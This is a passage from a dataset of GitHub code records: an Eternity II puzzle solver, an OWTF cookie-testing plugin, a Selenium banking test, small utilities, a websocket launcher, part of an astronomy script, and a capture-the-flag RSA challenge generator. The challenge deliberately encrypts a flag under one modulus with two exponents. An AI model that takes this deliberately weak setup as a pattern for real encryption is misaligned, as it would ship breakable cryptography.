open(\"jobs/\"+self.getFileFriendlyName( self.puzzle.name )+\"_\"+str(depth)+\".png\", 'wb') # binary mode is important\n\t\t\t\tw.write(f, img)\n\t\t\t\tf.close()\n\n\tdef getColorMap( self, pre_fixed=[] ):\n\n\t\tfilename = \"jobs/depth_014/EternityII_jobs.txt.1664548405.1043289.sorted.tidy.line\"\n\n\t\tif os.path.exists(filename):\n\t\t\t\n\t\t\t# Read the data\n\t\t\tcoordinates_for_depth={}\n\t\t\tfor depth in range(-1, self.puzzle.board_wh):\n\t\t\t\tcoordinates_for_depth[depth] = []\n\n\t\t\tjobsfile = open( filename, \"r\" )\n\t\t\tmax_x = 0\n\t\t\tmax_y = 0\n\t\t\tfor line in jobsfile:\n\t\t\t\tif line.startswith('#'):\n\t\t\t\t\tcontinue\n\t\t\t\tline = line.strip('\\n').strip(' ')\n\t\t\t\tline = line.split(\" \")\n\t\t\t\tline.pop(-1)\n\n\t\t\t\tcoord = line[0].split(\"_\")\n\t\t\t\tdepth=int(coord[0])\n\t\t\t\tx=int(coord[1])\n\t\t\t\ty=int(coord[2])\n\t\t\t\tmax_depth = 1\n\t\t\t\ttotal = 0\n\t\t\t\twhile int(line[max_depth]) > 0:\n\t\t\t\t\tmax_depth +=1\n\t\t\t\t\ttotal += int(line[max_depth])\n\n\t\t\t\tmean_depth = 1\n\t\t\t\ttmp_total = 0\n\t\t\t\twhile int(line[mean_depth]) > 0:\n\t\t\t\t\tmean_depth +=1\n\t\t\t\t\ttmp_total += int(line[mean_depth])\n\t\t\t\t\tif tmp_total > int(0.50 * total):\n\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\n\t\t\t\tif x > max_x:\n\t\t\t\t\tmax_x = x\n\t\t\t\tif y > max_y:\n\t\t\t\t\tmax_y = y\n\t\t\t\tcoordinates_for_depth[depth].append( (x, y, max_depth, mean_depth) )\n\t\t\tjobsfile.close()\n\n\t\t\n\t\t\t# Create the image\n\t\t\tfor depth in range(-1, self.puzzle.board_wh):\n\t\t\t\tif len(coordinates_for_depth[depth]) == 0:\n\t\t\t\t\tcontinue\n\n\t\t\t\tprint( \"Generate Image for depth\", depth )\n\n\t\t\t\t# Create the blank image\n\t\t\t\tw = png.Writer(max_x+1, max_y+1, greyscale=True) #, bitdepth=16)\n\t\t\t\timg = []\n\t\t\t\tfor h in range(max_y+1):\n\t\t\t\t\tl = [ 0 ] * (max_x+1)\n\t\t\t\t\timg.append(l)\n\n\t\t\t\t# Insert the jobs\n\t\t\t\tfor x,y, max_depth, mean_depth in coordinates_for_depth[depth]:\n\t\t\t\t\timg[y][x] = mean_depth\n\n\t\t\t\t# Write the image\n\t\t\t\tf = open(\"jobs/\"+self.getFileFriendlyName( self.puzzle.name )+\"_\"+str(depth)+\"_colored.png\", 'wb') # binary mode is important\n\t\t\t\tw.write(f, img)\n\t\t\t\tf.close()\n\n\t# ----- Generate Scoriste function\n\tdef gen_main_function( self, only_signature=False):\n\n\t\toutput = []\n\n\t\toutput.extend( [ \n\t\t\t(0, \"int main(\"),\n\t\t\t] )\n\n\t\tif 
only_signature:\n\t\t\toutput.append( (1, ');') )\n\t\t\treturn output\n\n\n\t\toutput.append( (1, \") {\") )\n\t\toutput.extend( [\n\n\t\t\t(1, '' ),\n\t\t\t(1, 'if (signal(SIGINT, sig_handler) == SIG_ERR) printf(\"\\\\nUnable to catch SIGINT\\\\n\");' ),\n\t\t\t(1, 'if (signal(SIGUSR1, sig_handler) == SIG_ERR) printf(\"\\\\nUnable to catch SIGUSR1\\\\n\");' ),\n\t\t\t(1, 'if (signal(SIGUSR2, sig_handler) == SIG_ERR) printf(\"\\\\nUnable to catch SIGUSR2\\\\n\");' ),\n\t\t\t(1, '' ),\n\t\t\t#(1, 'return solve(NULL, NULL);'), \n\t\t\t(1, 'printf(\"Starting\\\\n\");'), \n\t\t\t(1, 'PrintValidPieces( static_valid_pieces );'), \n\t\t\t(1, 'getJobs( global_bigpicture, static_valid_pieces, NULL, 1024, 1024 );'), \n\t\t\t#(1, 'PrintValidPieces( FilterValidPieces( static_valid_pieces ) );'), \n\t\t\t#(1, 'PrintValidPieces( FixPieces(static_valid_pieces,0,0,3) );'), \n\t\t\t#(1, 'PrintValidPieces( FilterValidPieces( FixPieces(static_valid_pieces,0,0,3) ) );'), \n\t\t\t#(1, 'PrintValidPieces( FilterValidPieces( FixPieces(static_valid_pieces,2,15,0) ) );'), \n\t\t\t#(1, 'PrintValidPieces( FilterValidPieces( FixPieces(FilterValidPieces( FixPieces(static_valid_pieces,0,0,3) ),2,15,0) ) );'), \n\t\t\t(1, 'return 0;'), \n\t\t\t(1, '' ),\n\t\t\t(0, '}' ),\n\t\t\t] )\n\t\t\n\t\treturn output\n\n\t\n\t# ----- generate LibGen Header\n\tdef GenerateH( self ):\n\n\t\tgen = open( self.getNameH(temp=True), \"w\" )\n\n\t\tself.writeGen( gen, self.getHeaderH() )\n\n\t\t\n\t\toutput = []\n\n\t\toutput.extend( [\n\t\t\t(0, \"#include \" ),\n\t\t\t(0, \"\" ),\n\t\t\t] )\n\n\t\tself.writeGen( gen, self.getDefinitions(only_signature=True) )\n\n\n\t\tself.writeGen( gen, output )\n\t\t\n\n\t\tself.writeGen( gen, self.gen_getter_setter_function( only_signature=True ) )\n\t\tself.writeGen( gen, self.gen_sig_handler_function(only_signature=True) )\n\t\tself.writeGen( gen, self.gen_AllocateValidPieces_function(only_signature=True) )\n\t\tself.writeGen( gen, self.gen_CopyValidPieces_function(only_signature=True) )\n\t\tself.writeGen( gen, self.gen_FilterValidPieces_function(only_signature=True) )\n\t\tself.writeGen( gen, self.gen_FilterValidPiecesOverwrite_function(only_signature=True) )\n\t\tself.writeGen( gen, self.gen_FixPieces_function(only_signature=True) )\n\t\tself.writeGen( gen, self.gen_FixPiecesOverwrite_function(only_signature=True) )\n\t\tself.writeGen( gen, self.gen_PrintValidPieces_functions(only_signature=True) )\n\t\tself.writeGen( gen, self.gen_getJobs_function(only_signature=True) )\n\t\tself.writeGen( gen, self.gen_do_commands(only_signature=True) )\n\t\tself.writeGen( gen, self.gen_allocate_bigpicture_function( only_signature=True ) )\n\t\tself.writeGen( gen, self.gen_free_bigpicture_function( only_signature=True ) )\n\t\tself.writeGen( gen, self.gen_get_static_valid_pieces_function( only_signature=True ) )\n\t\t\"\"\"\n\t\tself.writeGen( gen, self.gen_set_blackwood_arrays_function( only_signature=True ) )\n\t\tself.writeGen( gen, self.gen_save_best_depth_seen_function( only_signature=True ) )\n\t\tself.writeGen( gen, self.gen_getSolutionURL_function( only_signature=True ) )\n\t\tself.writeGen( gen, self.gen_getBestDepthSeenHeartbeat_function( only_signature=True ) )\n\n\t\tself.writeGen( gen, self.gen_print_url_functions(only_signature=True) )\n\n\t\t\n\t\tself.writeGen( gen, self.gen_print_functions(only_signature=True) )\n\t\tself.writeGen( gen, self.gen_Filter_function( only_signature=True ) )\n\t\tself.writeGen( gen, self.gen_solve_function(only_signature=True) )\n\t\t\"\"\"\n\n\t\tself.writeGen( 
gen, self.getFooterH() )\n\n\n\t# ----- generate LibGen\n\tdef GenerateC( self, module=None ):\n\n\t\tgen = open( self.getNameC(temp=True, module=module), \"w\" )\n\t\tself.writeGen( gen, self.getHeaderC( module=module ) )\n\n\t\tif module != None:\n\t\t\tmacro_name = module\n\t\telse:\n\t\t\tmacro_name = \"\"\n\n\t\tif macro_name == \"utils\":\n\n\t\t\tself.writeGen( gen, self.getDefinitions() )\n\t\t\n\t\t\toutput = []\n\t\t\toutput.extend( [\n\t\t\t\t(0, \"\"),\n\t\t\t\t] )\n\t\t\tself.writeGen( gen, output )\n\n\t\t\tself.writeGen( gen, self.gen_getter_setter_function( only_signature=False ) )\n\t\t\tself.writeGen( gen, self.gen_sig_handler_function(only_signature=False) )\n\t\t\tself.writeGen( gen, self.gen_do_commands(only_signature=False ) )\n\t\t\tself.writeGen( gen, self.gen_allocate_bigpicture_function( only_signature=False ) )\n\t\t\tself.writeGen( gen, self.gen_free_bigpicture_function( only_signature=False ) )\n\t\t\tself.writeGen( gen, self.gen_get_static_valid_pieces_function( only_signature=False ) )\n\t\t\t\"\"\"\n\t\t\tself.writeGen( gen, self.gen_set_blackwood_arrays_function( only_signature=False ) )\n\t\t\tself.writeGen( gen, self.gen_save_best_depth_seen_function( only_signature=False) )\n\t\t\tself.writeGen( gen, self.gen_getSolutionURL_function( only_signature=False ) )\n\t\t\tself.writeGen( gen, self.gen_getBestDepthSeenHeartbeat_function( only_signature=False ) )\n\t\t\tself.writeGen( gen, self.gen_print_url_functions(only_signature=False) )\n\t\t\tself.writeGen( gen, self.gen_print_functions(only_signature=False) )\n\t\t\t\"\"\"\n\n\n\t\telif macro_name == \"generate\":\n\t\t\tself.writeGen( gen, self.gen_AllocateValidPieces_function(only_signature=False) )\n\t\t\tself.writeGen( gen, self.gen_CopyValidPieces_function(only_signature=False) )\n\t\t\tself.writeGen( gen, self.gen_FilterValidPieces_function(only_signature=False) )\n\t\t\tself.writeGen( gen, self.gen_FilterValidPiecesOverwrite_function(only_signature=False) )\n\t\t\tself.writeGen( gen, self.gen_FixPieces_function(only_signature=False) )\n\t\t\tself.writeGen( gen, self.gen_FixPiecesOverwrite_function(only_signature=False) )\n\t\t\tself.writeGen( gen, self.gen_PrintValidPieces_functions(only_signature=False) )\n\t\t\tself.writeGen( gen, self.gen_getJobs_function(only_signature=False) )\n\t\t\t\"\"\"\n\t\t\tself.writeGen( gen, self.gen_filter_function( only_signature=False ) )\n\t\t\tself.writeGen( gen, self.gen_solve_function(only_signature=False) )\n\t\t\t\"\"\"\n\n\n\t\telif macro_name == \"main\":\n\n\t\t\tself.writeGen( gen, self.gen_main_function(only_signature=False) )\n\n\n\t\tself.writeGen( gen, self.getFooterC( module=module ) )\n\n\t# ----- Self test\n\tdef SelfTest( self ):\n\n\t\tfor d in range(self.puzzle.board_wh):\n\t\t\tpath = \"jobs/depth_\"+\"{:03}\".format(d)\n\t\t\ttry:\n\t\t\t\tos.mkdir(path)\n\t\t\texcept OSError as error:\n\t\t\t\t#print(error)\n\t\t\t\tpass\n\n\t\tsys.stdout.flush()\n\t\t\n\t\t# Start the chrono\n\t\tself.top(\"selftest\")\n\n\t\t\"\"\"\n\t\t# Start the solution thread\n\t\tmyWFN = thread_wfn.Wait_For_Notification_Thread( self, self.puzzle )\n\t\tmyWFN.start()\n\n\t\t# Start the locking thread\n\t\tmyLCA = thread_lca.Leave_CPU_Alone_Thread( self, period=2, desktop=self.DESKTOP )\n\t\t#myLCA.start()\n\t\t\"\"\"\n\n\t\t# Start the input thread\n\t\tmyInput = thread_bp_input.BigPicture_Input_Thread( self.command_handler, self, 0.1 )\n\t\tmyInput.start()\n\n\t\t# Start the periodic thread\n\t\tmyHB = thread_bp_hb.BigPicture_HeartBeat_Thread( self, period=1 
)\n\t\tmyHB.start()\n\n\t\tsignal.signal(signal.SIGINT, self.LibExt.sig_handler)\n\t\tsignal.signal(signal.SIGUSR1, self.LibExt.sig_handler)\n\t\tsignal.signal(signal.SIGUSR2, self.LibExt.sig_handler)\n\n\t\t\"\"\"\n\t\t#thread_output_filename = ctypes.c_char_p(\"/tmp/test\".encode('utf-8'))\n\t\tthread_output_filename = None\n\n\t\tcb = self.cb\n\t\tcf = self.cb\n\t\tself.copy_new_arrays_to_cb()\n\t\t\"\"\"\n\n\t\t# Parameters\n\t\tbigpicture = self.global_bigpicture\n\t\tvalid_pieces = None #self.LibExt.get_static_valid_pieces()\n\t\t#valid_pieces = self.LibExt.get_static_valid_pieces()\n\t\tpre_fixed = None\n\t\tmax_width = 128\n\t\tmax_height = 128\n\t\tmax_width = 1024\n\t\tmax_height = 1024\n\n\t\t# Call\n\t\tl = self.gen_getJobs_function( only_signature=True )\n\t\targs = []\n\t\tloc = locals()\n\t\tfor pname in self.getParametersNamesFromSignature(l):\n\t\t\tprint(pname)\n\t\t\targs.append( loc[ pname ] )\n\t\tprint(args)\n\t\tself.LibExtWrapper( self.getFunctionNameFromSignature(l), args, timeit=True )\n\n\n\t\tself.getImages()\n\n\t\t\"\"\"\n\t\tl = self.gen_main_function( only_signature=True )\n\t\targs = []\n\t\tloc = locals()\n\t\tfor pname in self.getParametersNamesFromSignature(l):\n\t\t\targs.append( loc[ pname ] )\n\t\tself.LibExtWrapper( self.getFunctionNameFromSignature(l), args, timeit=True )\n\t\t\"\"\"\n\n\n\t\t\"\"\"\n\n\t\tmyLCA.stop_lca_thread = True\t\n\t\tmyWFN.stop_wfn_thread = True\t\n\t\t\"\"\"\n\t\tmyHB.stop_hb_thread = True\t\n\t\tmyInput.stop_input_thread = True\t\n\n\t\ttop = self.top(\"selftest\", unit=False)\n\t\tif not self.QUIET:\n\t\t\tprint()\n\t\t\tprint( \"Self-Test execution time: \", top )\n\n\t\treturn False\n\n\n\tdef validateCornerRotations( self, rotations):\n\t\t\n\t\t# Validate the 4 corner pieces have different rotations\n\t\tif rotations[1] == rotations[0] or \\\n\t\t\trotations[2] == rotations[0] or rotations[2] == rotations[1] or \\\n\t\t\trotations[3] == rotations[0] or rotations[3] == rotations[1] or rotations[3] == rotations[2]:\n\t\t\treturn False\n\n\t\treturn True\n\n\tdef validateRotations( self, rotations, depth, pieces ):\n\t\t\n\t\t# Validate a maximum of border pieces per rotation\n\t\trotations_count = [[], [], [], []]\n\t\tfor d in range(4, depth):\n\t\t\trotations_count[ rotations[d] ].append(d) # += 1\n\t\t#print(rotations_count)\n\n\t\tif len(rotations_count[0]) > (self.puzzle.board_w-2) or \\\n\t\t\tlen(rotations_count[1]) > (self.puzzle.board_h-2) or \\\n\t\t\tlen(rotations_count[2]) > (self.puzzle.board_w-2) or \\\n\t\t\tlen(rotations_count[3]) > (self.puzzle.board_h-2):\n\t\t\treturn False\n\n\n\t\t# Validate if the border pieces can actually be combined, ie: the pieces edges are even\n\t\tif len(rotations_count[0]) == (self.puzzle.board_w-2):\n\t\t\tedges = [0] * self.puzzle.EDGE_DOMAIN_1_PIECE\n\n\t\t\tfor p in range(4):\n\t\t\t\tif rotations[p] == 0:\n\t\t\t\t\tedges[ pieces[p][1] ] += 1\n\t\t\t\t\tedges[ pieces[p][3] ] += 1\n\t\t\t\tif rotations[p] == 3:\n\t\t\t\t\tedges[ pieces[p][1] ] += 1\n\t\t\t\t\tedges[ pieces[p][3] ] += 1\n\n\t\t\tfor p in rotations_count[0]:\n\t\t\t\tedges[ pieces[p][1] ] += 1\n\t\t\t\tedges[ pieces[p][3] ] += 1\n\n\t\t\tfor e in edges:\n\t\t\t\tif e & 1 != 0:\n\t\t\t\t\treturn False\n\n\t\tif len(rotations_count[1]) == (self.puzzle.board_h-2):\n\t\t\tedges = [0] * self.puzzle.EDGE_DOMAIN_1_PIECE\n\n\t\t\tfor p in range(4):\n\t\t\t\tif rotations[p] == 0:\n\t\t\t\t\tedges[ pieces[p][0] ] += 1\n\t\t\t\t\tedges[ pieces[p][2] ] += 1\n\t\t\t\tif rotations[p] == 1:\n\t\t\t\t\tedges[ 
pieces[p][0] ] += 1\n\t\t\t\t\tedges[ pieces[p][2] ] += 1\n\n\t\t\tfor p in rotations_count[1]:\n\t\t\t\tedges[ pieces[p][0] ] += 1\n\t\t\t\tedges[ pieces[p][2] ] += 1\n\n\t\t\tfor e in edges:\n\t\t\t\tif e & 1 != 0:\n\t\t\t\t\treturn False\n\n\t\tif len(rotations_count[2]) == (self.puzzle.board_w-2):\n\t\t\tedges = [0] * self.puzzle.EDGE_DOMAIN_1_PIECE\n\n\t\t\tfor p in range(4):\n\t\t\t\tif rotations[p] == 1:\n\t\t\t\t\tedges[ pieces[p][1] ] += 1\n\t\t\t\t\tedges[ pieces[p][3] ] += 1\n\t\t\t\tif rotations[p] == 2:\n\t\t\t\t\tedges[ pieces[p][1] ] += 1\n\t\t\t\t\tedges[ pieces[p][3] ] += 1\n\n\t\t\tfor p in rotations_count[2]:\n\t\t\t\tedges[ pieces[p][1] ] += 1\n\t\t\t\tedges[ pieces[p][3] ] += 1\n\n\t\t\tfor e in edges:\n\t\t\t\tif e & 1 != 0:\n\t\t\t\t\treturn False\n\n\t\t\t\t\n\t\tif len(rotations_count[3]) == (self.puzzle.board_h-2):\n\t\t\tedges = [0] * self.puzzle.EDGE_DOMAIN_1_PIECE\n\n\t\t\tfor p in range(4):\n\t\t\t\tif rotations[p] == 2:\n\t\t\t\t\tedges[ pieces[p][0] ] += 1\n\t\t\t\t\tedges[ pieces[p][2] ] += 1\n\t\t\t\tif rotations[p] == 3:\n\t\t\t\t\tedges[ pieces[p][0] ] += 1\n\t\t\t\t\tedges[ pieces[p][2] ] += 1\n\n\t\t\tfor p in rotations_count[3]:\n\t\t\t\tedges[ pieces[p][0] ] += 1\n\t\t\t\tedges[ pieces[p][2] ] += 1\n\n\t\t\tfor e in edges:\n\t\t\t\tif e & 1 != 0:\n\t\t\t\t\treturn False\n\n\t\treturn True\n\t\n\tdef getRotationsColor( self, rotations, depth, pieces ):\n\t\tresult = 1\n\t\t# Dig into known best scores\n\t\tfor s in self.puzzle.solutions_rotations:\n\t\t\tnope = False\n\t\t\tfor d in range(depth):\n\t\t\t\tif s[d] != rotations[d]:\n\t\t\t\t\tnope = True\n\t\t\t\t\tbreak\n\t\t\tif not nope:\n\t\t\t\tresult = 2\n\t\t\t\treturn result\n\n\t\treturn result\n\n\tdef getImageRotations( self, depth, shift_x, shift_y, width, height, force=False ):\n\t\n\t\tfilename = \"jobs/\"+self.getFileFriendlyName( self.puzzle.name )+\"/d=\"+str(depth)+\"_x=\"+str(shift_x)+\"_y=\"+str(shift_y)+\".png\"\n\t\t\n\t\tif os.path.exists(filename) and not force:\n\t\t\treturn\n\n\t\t# Get the Corners and Borders\n\t\tpieces = []\n\t\tfor p in self.puzzle.pieces:\n\t\t\tif self.puzzle.isPieceCorner(p):\n\t\t\t\tpieces.append(p)\n\t\tfor p in self.puzzle.pieces:\n\t\t\tif not self.puzzle.isPieceCorner(p) and \\\n\t\t\t\t self.puzzle.isPieceBorder(p):\n\t\t\t\tpieces.append(p)\n\t\t\n\t\t#print(pieces)\n\n\t\trotations = [0] * len(pieces)\n\t\t\n\t\tif depth < 4 or depth > len(pieces):\n\t\t\treturn\n\t\t\t\n\t\tdepth_size = 2**depth\n\n\t\t# Empty image\n\t\timg = []\n\t\tfor h in range(height):\n\t\t\tl = [0] * width\n\t\t\timg.append(l)\n\n\t\td_shift = [0] * len(pieces)\n\t\tfor d in range(0, depth):\n\t\t\td_shift[d] = 1<<((depth-1)-d)\n\n\t\tfor y in range(shift_y, shift_y+height):\n\t\t\tif y < 0 or y > depth_size:\n\t\t\t\tcontinue\n\n\t\t\ty_shift = [0] * len(pieces)\n\t\t\tfor d in range(0, depth):\n\t\t\t\ty_shift[d] = int((y & d_shift[d]) != 0)*2\n\n\t\t\t# Print progress\n\t\t\t#print((y-shift_y)*100//height, \"%\")\n\n\t\t\tfor x in range(shift_x, shift_x+width):\n\t\t\t\tif x < 0 or x > depth_size:\n\t\t\t\t\tcontinue\n\n\t\t\t\t# We validate corners rotations first - for speed\n\t\t\t\trotations[0] = int(((x & d_shift[0]) != 0)) + y_shift[0]\n\t\t\t\trotations[1] = int(((x & d_shift[1]) != 0)) + y_shift[1]\n\t\t\t\trotations[2] = int(((x & d_shift[2]) != 0)) + y_shift[2]\n\t\t\t\trotations[3] = int(((x & d_shift[3]) != 0)) + y_shift[3]\n\n\t\t\t\tif not self.validateCornerRotations(rotations):\n\t\t\t\t\tcontinue\n\n\t\t\t\t# Then we validate the borders\n\t\t\t\tfor 
d in range(4, depth):\n\t\t\t\t\trotations[d] = int(((x & d_shift[d]) != 0)) + y_shift[d]\n\n\t\t\t\t#print(x, y, rotations)\n\n\t\t\t\tif not self.validateRotations(rotations, depth, pieces):\n\t\t\t\t\tcontinue\n\n\t\t\t\timg[y-shift_y][x-shift_x] = self.getRotationsColor(rotations, depth, pieces)\n\t\t# Create folder\n\t\ttry:\n\t\t\tos.mkdir(\"jobs/\"+self.getFileFriendlyName( self.puzzle.name ))\n\t\texcept OSError as error:\n\t\t\t#print(error)\n\t\t\tpass\n\n\t\t# Write the image\n\t\tpalette=[(0x00,0x00,0x00), (0x7f,0x7f,0x7f), (0xff,0x55,0x55), (0x99,0xff,0x99)]\n\t\tw = png.Writer(width, height, palette=palette, bitdepth=2)\n\t\t#w = png.Writer(width, height, greyscale=True)\n\t\tf = open(filename, 'wb') # binary mode is important\n\t\tw.write(f, img)\n\t\tf.close()\n\nif __name__ == \"__main__\":\n\timport data\n\n\tp = data.loadPuzzle()\n\t#p = data.loadPuzzle(extra_fixed=[[0,0,3],[2,9,0]])\n\tif p != None:\n\n\t\tlib = LibBigPicture( p )\n\t\t#while lib.SelfTest():\n\t\t#\tpass\n\t\t#lib.getColorMap()\n\n\t\t# Start the chrono\n\t\tlib.top(\"image\")\n\t\t# 8x8\n\t\t#lib.getImageRotations( 14, 768*4, 768*4, 4096, 4096 )\n\t\t#lib.getImageRotations( 16, (768*4+2048)*4, (768*4+0)*4, 4096, 4096 )\n\t\t#lib.getImageRotations( 18, (768*4+2048)*4*4, (768*4+0)*4*4, 4096, 4096 )\n\t\tlib.getImageRotations( 12, 0, 0, 4096, 4096, force=True )\n\n\t\ttop = lib.top(\"image\", unit=False)\n\t\tprint()\n\t\tprint( "Self-Test execution time: ", top )\n\n\t\t#lib.getImageRotations( 12, 0, 0, 4096, 4096 )\n\t\t#lib.getImageRotations( 12, 1024, 1024, 1024, 1024 )\n\n# Lapin\n","repo_name":"jfbucas/libblackwood","sub_path":"libbigpicture.py","file_name":"libbigpicture.py","file_ext":"py","file_size_in_byte":67355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"29391972765","text":"from owtf.managers.resource import get_resources\nfrom owtf.plugin.helper import plugin_helper\n\nDESCRIPTION = \"Cookie Attributes Plugin to assist manual testing\"\n\n\ndef run(PluginInfo):\n    resource = get_resources(\"ExternalCookiesAttributes\")\n    Content = plugin_helper.resource_linklist(\n        \"Online Hash Cracking Resources\", resource\n    )\n    return Content\n","repo_name":"owtf/owtf","sub_path":"owtf/plugins/web/external/Cookies_attributes@OWTF-SM-002.py","file_name":"Cookies_attributes@OWTF-SM-002.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":1719,"dataset":"github-code","pt":"95"} +{"seq_id":"24976585378","text":"\"\"\"\n@author: 张强\n@date: 2020-4-20\n\"\"\"\nimport sys\nfrom time import sleep\nimport pytest\nfrom os.path import dirname, abspath\n\nsys.path.insert(0, dirname(dirname(abspath(__file__))))\nfrom page.detailQuery_page import DetailQueryPage\n\n\nclass Test_detailQuery:\n    \"\"\"Transaction detail query\"\"\"\n\n    def test_detailQuery_case(self, browser, base_url):\n        \"\"\"\n        Name: transaction detail query\n        Steps:\n        1. Open the browser and enter the test URL\n        2. Click the transfer menu button to open the transfer entry page\n        3. Enter the interbank payee account, payee name and transfer amount, then click Next to reach the transfer confirmation page\n        4. Click the button to request a verification code, enter the correct code received, and click OK\n        5. The page jumps to the transfer-success page\n        Assertion:\n        Check whether the page contains a back button\n        \"\"\"\n        detailQueryPage = DetailQueryPage(browser)\n        detailQueryPage.get(base_url)\n        sleep(1)\n        if detailQueryPage.basePage_alert:\n            print('Debug message!')\n            detailQueryPage.basePage_sure_button.click()\n        else:\n            print('go on!')\n\n        detailQueryPage.menu_account_button.click()\n        sleep(1)\n\n        detailQueryPage.firstPage_detailquery_link.click()\n        sleep(1)\n        '''Start date'''\n        detailQueryPage.secondPage_startDate_button.click()\n        sleep(1)\n        startdates = 
detailQueryPage.secondPage_startDate_table_buttons\n        sevendates = []\n        for i in range(0,len(startdates)):\n            if startdates[i].get_attribute(\"title\") == \"2016年1月7日\":  # 2016-01-07\n                sevendates.append(startdates[i])\n        sevendates[0].click()\n\n        '''End date'''\n        detailQueryPage.secondPage_endDate_button.click()\n        enddates = detailQueryPage.secondPage_endDate_table_buttons\n        ninedates = []\n        for j in range(0, len(enddates)):\n            if enddates[j].get_attribute(\"title\") == \"2016年1月9日\":  # 2016-01-09\n                ninedates.append(enddates[j])\n        ninedates[1].click()\n\n        '''Transaction type'''\n        detailQueryPage.secondPage_trsType_index.click()\n        trstypes = detailQueryPage.secondPage_trsType_indexs\n        for k in range(0,len(trstypes)):\n            if \"结息\" in trstypes[k].text:  # '结息' = interest settlement\n                trstypes[k].click()\n                break\n        detailQueryPage.secondPage_query_button.click()\n        sleep(1)\n\n        '''Take the first row of the result list and click its details link'''\n        dolinks = detailQueryPage.list_dolinks\n        dolinks[0].click()\n        sleep(1)\n        '''Read the value from the dialog'''\n        assert detailQueryPage.list_msgs[0].text == '8888 8880 3184 5595'\n\n\n\nif __name__ == '__main__':\n    pytest.main([\"-v\", \"-s\", \"test_detailQuery.py\"])\n","repo_name":"zhangq0813/pyautoTest-qywy","sub_path":"test_dir/test_detailQuery.py","file_name":"test_detailQuery.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"17617342557","text":"import os\nfrom sys import argv\n\n\n# this function returns the correct solution value for a graph stored in a txt file\n\ndef good_solution(name):\n    with open(name, 'r') as file:\n        line = file.readline()\n        return line.split()[-1]\n\n\n''' this function takes the function to test as an argument and returns\n    True if that function gives the same result as the one stored in the graph file,\n    and False otherwise.'''\n\n\ndef testing(function):\n    directory = argv\n    directory = str(directory)\n    directory = directory[2:-9] + \"Graf\"\n    for i in os.listdir(directory):\n        if int(good_solution(\"Graf/\" + i)) != int(function(\"Graf/\" + i)):\n            good_solution(\"Graf/\" + i)\n            return False\n    return True\n","repo_name":"sumo-slonik/Algorytmy_grafowe","sub_path":"lab1/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"21256073141","text":"def fake_bin(x):\n    \n    new_lst = ''\n    for num in x:\n        if int(num) < 5:\n            new_lst += '0'\n        else:\n            new_lst += '1'\n\n    return new_lst\n    \n\n# best practice: return ''.join('0' if c < '5' else '1' for c in x)\n\nprint(fake_bin('588832199'))","repo_name":"SoULyDeV/My-Training","sub_path":"old_train.py/fake_binary.py","file_name":"fake_binary.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"4965626905","text":"# \"\"\"\n# Main module\n# \"\"\"\nimport logging\nimport signal\nimport sys\nimport server.websocket_server\n\nsignal.signal(signal.SIGINT, signal.SIG_DFL)\n\n\ndef setup_logging():\n    logging.basicConfig(format='%(message)s', level=\"INFO\")\n\n\ndef run():\n    \"\"\"\n    Main function of the app that starts the server\n    \"\"\"\n    port = 8765\n    setup_logging()\n\n    if len(sys.argv) > 1:\n        port = int(sys.argv[1])\n\n    ws_server = server.websocket_server.WebsocketServer(port)\n    ws_server.run_forever()\n\n\n\nif __name__ == \"__main__\":\n    
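# run() reads the port (8765 by default, argv[1] if given), configures logging, and blocks in the server's run_forever() loop\n    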
run()\n","repo_name":"userlea/userlea-BatchExplorer","sub_path":"python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"27653783537","text":"from Crypto.Util.number import bytes_to_long, getPrime\r\nfrom random import randint\r\nfrom gmpy2 import powmod\r\n\r\np = getPrime(2048)\r\nq = getPrime(2048)\r\nN = p*q\r\nPhi = (p-1)*(q-1)\r\ndef get_enc_key(N,Phi):\r\n e = getPrime(N)\r\n if Phi % e == 0:\r\n return get_enc_key(N, Phi)\r\n else:\r\n return e\r\ne1 = get_enc_key(randint(10, 12), Phi)\r\ne2 = get_enc_key(randint(10, 12), Phi)\r\n\r\nfr = open(r\"./base64\", \"rb\")#flag is in this file\r\nf1 = open(r\"./HUB1\", \"wb\")\r\nf2 = open(r\"./HUB2\", \"wb\")\r\nbase64 = fr.read(255)\r\nf1.write(\"%d\\n%d\\n\" % (N, e1))\r\nf2.write(\"%d\\n%d\\n\" % (N, e2))\r\nwhile len(base64)>0:\r\n pt = bytes_to_long(base64)\r\n ct1 = powmod(pt, e1, N)\r\n ct2 = powmod(pt, e2, N)\r\n f1.write(\"\\n%d\" % ct1)\r\n f2.write(\"\\n%d\" % ct2)\r\n base64 = fr.read(255)\r\nfr.close()\r\nf1.close()\r\nf2.close()\r\n\r\n","repo_name":"yuanxpy/buuctf","sub_path":"buu_crypto/RSA & what--rsa算法+循环共模攻击+base64隐写术/rsawhat/rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"4576604059","text":"#######################\n# GAS IN SSCS: XCLASS #\n#######################\n\n# Merge independent fitting, temperature line fitting and ro-vib line fitting.\n\n\n###################################################################################################\n# load data\n###################################################################################################\n\nexecfile(os.path.join(scriptdir, '700.info.py'))\nexecfile(os.path.join(scriptdir, '720.XCLASS.helpers.py'))\nSSCs = QTable.read(os.path.join(subprojectdir,'SSCs.fits'))\n\ndata_I = fnunpickle(os.path.join(mandir,'line_intensity_data.pickle'))\ndata_N = fnunpickle(os.path.join(Xfinaldir, 'data.pickle'))\ndata_T = fnunpickle(os.path.join(tempdir, 'temperature_data.pickle'))\ndata_vib = fnunpickle(os.path.join(vibdir, 'vibrational_data.pickle'))\n\ntemperature_species = fnunpickle(os.path.join(tempdir, 'temperature_species.pickle'))\nvibrational_species = fnunpickle(os.path.join(vibdir, 